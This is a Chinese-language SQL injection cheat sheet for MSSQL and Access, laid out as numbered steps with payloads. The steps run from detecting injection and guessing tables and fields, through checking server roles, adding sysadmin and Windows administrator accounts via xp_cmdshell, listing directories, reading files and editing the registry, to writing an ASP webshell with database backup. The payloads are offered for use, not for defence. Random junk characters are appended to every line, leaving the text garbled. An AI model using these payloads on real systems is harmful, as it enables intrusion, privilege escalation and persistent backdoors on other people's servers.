1.判断是否有注入;and 1=1 ;and 1=2 CeYhn\m5K0
2.初步判断是否是mssql ;and user>0 s * (a
h^\vk!Q-d
3.注入参数是字符'and [查询条件] and ''=' /f#b;qa,
OIP]9lM$nC
4.搜索时没过滤参数的'and [查询条件] and '%25'=' A<+Dx
z%D7x5!,R
5.判断数据库系统 KoERg&fY
<+k&8^:bi
;and (select count(*) from sysobjects)>0 mssql u_k[<&$
z5jw\jBD
;and (select count(*) from msysobjects)>0 access %zcA|SefP
jKq*@o~}
[|Qzx w9
).71gp@&
6.猜数据库 ;and (select Count(*) from [数据库名])>0 izl6L
'S_i6K
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %hVR|K|J
RNk|h
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >jI.$%L$
|n26[=\B
9.(1)猜字段的ascii值(access) Wlc&QOfF
g+#awi7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 cXb*d|-|N
(uC8M,I\
(2)猜字段的ascii值(mssql) fu5L)P^T
]}v]j`9m%
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 bIU.C|h@
p[Po*c.b
10.测试权限结构(mssql) hP"2X"kz&
Cy;UyZ
q}LDFsU
lbHgxZ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >bW=oTFz
T-] {gc
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- E.K^v/dNdq
joe)b
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ,CqWm9
"`% ,l|D
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- a}UmD
HS-
Jy(G
A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ,';|CGI cP
{+J{t\`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1=)M15
ZwUBeyxS=c
;and 1=(select IS_MEMBER('db_owner'));-- ? "I %K%
Q4u.v,sE
?AyxRbk
d>p' A_
11.添加mssql和系统的帐户 kOydh(yE
r07u6OA
;exec master.dbo.sp_addlogin username;-- DB|1Sqjsn
;exec master.dbo.sp_password null,username,password;-- ^^b'tP1>
7a"06Et^
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- V%8(zt
mUg :<.^
;exec master.dbo.xp_cmdshell 'net user username password ^%7(
]rv\sD`[
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- wK(]E%\
V9) /
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 'n'>+W:
^-"Iwy
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- "9caoPI0~
Q!+AiSTU
vG_R( ]d
A6]:BuP;c
12.(1)遍历目录 EZ<:>V-_D
'zYS:W
;create table dirs(paths varchar(100), id int) Skt-5S#
wMVUTm
;insert dirs exec master.dbo.xp_dirtree 'c:\' $?56 i4
n4{%M
;and (select top 1 paths from dirs)>0 +9Tc.3vQ
=dGp&9K,fw
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) pCE
GZV,d@
KuP#i]Na
\GL] I.
Jpapl%7v
(2)遍历目录 6|eqQ+(A
a`'>VCg
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- WGv 47i
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 |]< 3cW+
~[Tcl
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 GQbr}xX.#
J+P<zC
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 tW UI?\
<wSJK
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @vl$[Z|
!8G)`'
NVMn7H}>
B'yjMY![
13.mssql中的存储过程 [BE_^d5&
Q5ASN"_
xp_regenumvalues 注册表根键, 子键 Q4cCg7|0
:+"4_f0
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 MqZ"Js
e}uK"dl(
xp_regread 根键,子键,键值名 U6&`s%mIa
,iyy2
;exec xp_regread tc'iKJ5)
:H&Q!\a
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 uz!8=,DFw
p7|I>8ur.
xp_regwrite 根键,子键, 值名, 值类型, 值 d'';0[W)
X~r9yl>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 LA Crg
)-4c@
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #|sE]\bsH
.)
Ej#mk
xp_regdeletevalue 根键,子键,值名 k?fz @H8D(
,?8a3%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 TQ(q[:>
bL7Gkbs&|
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 oLoc jj~T
@6"MhF
5sJ>+Rg
(9u`(|x
14.mssql的backup创建webshell k{+cFG\C&
0T`Qoo>u
use model 4FaO+Eo,8
4~}NB%,
create table cmd(str image); 4V:W 8k 9D
$V87=_}
insert into cmd(str) values (''); 6u"wgX]H
:tZsSK
backup database model to disk='c:\l.asp'; dUv@u!}B
wH|%3@eJ
$+WXM$N
4np2I~ !
15.mssql内置函数 g@'XmT="_
}`w(sec:3
;and (select @@version)>0 获得Windows的版本号 |m-N5$\IC
4#(/{6J
;and user_name()='dbo' 判断当前系统的连接用户是不是sa OL\-SQ&
A-r;5?S
;and (select user_name())>0 爆当前系统的连接用户 &oMEz 0
i431mpMa
;and (select db_name())>0 得到当前连接的数据库 #2^0z`-\_z
F${sEtH
:gsRJy1
|mH* I
16.简洁的webshell 2Z{?3mAb;
,WE2.MWR
use model u{4P)DIQ
g"/n95k<
create table cmd(str image); ajycYk9<m
}uDpf0;^
insert into cmd(str) values (''); f6I)c$]Q
3Ws (],Q
backup database model to disk='g:\wwwtest\l.asp';